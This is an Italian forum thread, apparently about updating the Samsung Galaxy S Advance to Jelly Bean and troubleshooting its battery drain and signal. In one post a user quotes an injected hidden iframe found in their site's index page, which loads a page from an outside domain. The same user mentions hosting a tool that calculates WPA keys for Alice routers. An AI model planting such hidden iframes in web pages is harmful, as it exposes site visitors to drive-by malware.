bho ma ho dato un occhiata veloce al play store, però ho visto shadowgun dead zone
Visualizzazione stampabile
Rragazzi a me aprendo le ultime pagine di questo topic mi viene fuori sta pagina
http://img546.imageshack.us/img546/2209/malwaren.jpg
cmq, nessun'altro sa darmi consigli sulla batteria?
ringrazio iceberg per i consigli, ora metto il cellulare in modalità offline, e domani posto uno screen dei consumi batteria
e ma no basta che palle google ha rotto adesso..... mi segnala il sito perchè la pagina php del calcolo delle wpa alice viene vista come malware, cavolata perchè non lo è ed è pure disponibile per il download....
EDIT:
Scherzavo, mi hanno aggiunto codice alla index O.o
Edit:Quote:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dev.namebadgesupply.com/zmci.html?i=1037603></iframe></body>
Sito ripulito... richiesto controllo a google.. vediamo...
o dio non è che sia il massimo della fluidità esita un po' nell'aprire le applicazioni come detto prima per avviare una chiamata la tastiera numerica o la rubrica impiega circa 4 sec ad aprirsi (questo quando sta circa 10 min in latenza) ieri ho provato con ginger del mio amico e ginger è molto più reattivo e scattante non so che dire sarà per il fatto della memoria ram che lavora sempre a limite, speriamo che risolvano con qualche aggiornamento o con quella italiana
Ogni situazione come al solito e' storia a se.
Poi sai non si puo' giudicare una cosa appena installata , tra l'altro giustamente dopo un reset di fabbrica e pulizia delle cache il sistema diventa una scheggia anche con gingerbread :)
Comincia a caricarci applicazioni , usarne parecchie insieme ... la ram disponibile per le applicazioni e' aumentata ma anche quella occupata in partenza e' maggiore di prima.
Gia' qualcuno se leggi nei post indietro comincia a trovare qualche ritardo/impuntamento ...
Io ce l'ho da un paio di giorni e quello che posso dire , rispetto alla fluidita' lag etc . che miracoli non me li aspettavo e miracoli non ci sono stati.
Poi carino e' carino e non e' che mi lamenti ;)
in effetti è come quello che succedeva con s2 e s2 tim con nfc
secondo me avrà un bel pò di aggiornamenti questo JB in futuro, almeno me lo auguro, chissà magari JB in italia sta ritardando proprio per questi problemi riscontrati , speriamo lo migliorino uleteriormente
Facessero modifiche al fw poi ci sarebbero settimane di test
Don't be a n00b, be a newbie!
Inviato ascendendo con 7770 Tapatalk
OT: Notizia di poco fa che Google potrebbe presentare Android Key Lime Pie addirittura durante la solita convention annuale, ovvero tra il 15-17 Maggio. Secondo me non ci saranno aggiornamenti di Jelly Bean a meno che non saltino fuori dei bug esagerati...
Come detto dagli altri sara' dura che cambi qualcosa nel firmware italiano.
La base rimarra' quella con qualche personalizzazione regionale ... sempre invece che non peggiori visto il bug scroll nella rubrica di ginger :)
Per il futuro puo' anche darsi ...
ecco il grafico della mia batteria in modalità offline (ultima parte del grafico)http://img502.imageshack.us/img502/4...3011111434.png
guarda dal grafico si capisce che il tuo smatphone non ha processi attivi mentre è inutilizzato e senza linea, quindi già da questo dovresti star tranquillo che non c'è nessun processo o applicazione che consumano batteria..per il resto..io continuo a sostenere che il tuo problema è la linea telefonica..guarda un po nel grafico e si vede tutto..hai degli switch nella rete impressionanti..in 15 ore neanche il 50 anzi oserei dire 30 % sei rimasto sotto decente copertura..il resto del tempo il tuo smartphone lo ha passato a saltare da una linea all'altra..io non mi preoccuperei..penso nelle tue condizioni sia normale un consumo del genere..nella discussione sull'update nella sezione modding c'è un altro utente che la batteria gli è durata 2 giorni e qualcosa..ma se vai a vedere nel grafico non ha gli stessi switch tuoi nella linea..morale: o cambi operatore o ricarichi ogni sera..mi dispiace non potertiu aiutare diversamente..
Ma come si vede nel grafico io ho usato Wi-Fi, posterò un grafico solo connessione dati, grazie mille dell'aiuto
Inviato dal mio GT-I9070 usando Androidiani App
La pagina facebook del nostro device ha detto che è questione di settimane per jb in italia
Inviato dal mio GT-I9070
go go gooooooooooo
Da quando ho aggiornato a jelly bean noto dei cali di percentuale batteria abbastanza fastidiosi...
Premetto che ho fatto il wipe data da recovery dopo il flash.
Qualcuno ha il mio stesso problema o qualche idea su da cosa possa dipendere?
Inviato dal mio GT-I9070 con Tapatalk 2
Allegato 40904
Ecco il post su facebook
Speriamo di non aspettare molto (Marzo!)
Secondo me, tenendo presente che l'aggiornamento è già pronto e funzionante (ne è la prova il rilascio in Russia, banco di test importante per Samsung), potremmo già riceverlo entro la fine di gennaio.
Sempre secondo me, si tratta solo di pianificare l'uscita pian piano nei vari paese europei per evitare di intasare i server, percui vedremo il rilascio dell'aggiornamento che di settimana in settimana si propagherà in tutta Europa. Credo che il prossimo paese a beneficiare dell'aggiornamento sia la Germania... per le conferme date da Samsung Germania...
ragazzi scusate l'ignoranza in materia ma l'aggiornamento a jelly bean si può fare pure su un i9070 brandizzato tre?
Allegato 40906 questo è il mio non credo ci sia questa gran differenza, oggi mi era venuto un lampo di genio pensavo di poter copiare i suoni di notifica del telefono s3 di mio fratello e poterli sostituire con quelli miei attuali di JB cosi da poter avere un volume più alto all'arrivo delle notifiche, ma ho scoperto che nn c'è modo di potervi accedere, a voi risulta? o c'è qualche procedura? :(
Salve a tutti! volevo chiedervi un info. io ho aggiornato il mio S Advance a JB da tre giorni... volevo chiedervi, come mai non fa effettuare più una screenshot?!?! mentre con la versione precedente la 2.3.6 me la facva fare normalmente? Grazie mille!
io l'ho appena fatto come vedi sopra
Ho visto grazie... ma non capisco perchè non mi scatta la foto se tengo premuti contemporaneamente tasto centrale e tasto di blocco/spegnimento ...
Ti ringrazio... ho provato adesso... e in pratica bisogna tenere a lungo i due tasti e funziona grazie mille! gentilissimo!!
scusate potete mettere un link con la guida perchè vorrei aggiornare ma non sono molto esperto...
trovi tutto nel thread in rilievo in sezione modding, spiegato nel dettaglio
C'è anche il rosso se è per quello rotfl Nella tua zona evidentemente non c'è un buon segnale
Don't be a n00b, be a newbie!
Inviato ascendendo con 7770 Tapatalk
sono nuovo e per me è come se hai parlato in un altra lingua potresti dirmi come arrivo al thread?
Ho una sim che ha più di 10 anni. Potrebbe dipendere da quello? Magari è un tipo vecchio.Quote:
C'è anche il rosso se è per quello Nella tua zona evidentemente non c'è un buon segnale
ecco il consumo della batteria in connessione dati attiva per 6ore di seguito
http://img18.imageshack.us/img18/680...3011118123.png
aiutatemi anche quando sono senza connessione dati (voi avevate detto che il mio problema è la rete, intendete proprio rete mobile in tutto o solamente connessione dati?)
AIUTATEMI (leggetelo alla christian de sica)
Clicchi su sezione modding s advance e lo trovi in rilievo
Sinceramente non credo, però prova a cambiarla (stesso operatore) e a vedere se il grafico rimane uguale o diventa verde. Se lo diventa è la sim, altrimenti il segnale
Don't be a n00b, be a newbie
Inviato dopo essere asceso, con Tapatalk
Scusami dell ho un altro dubbio. Quando il cel è in connessione dati attiva mi esce l'icona H, so che su IC c'è anche l'icona +H. Per caso esiste anche su GB? Non l'ho mai vista.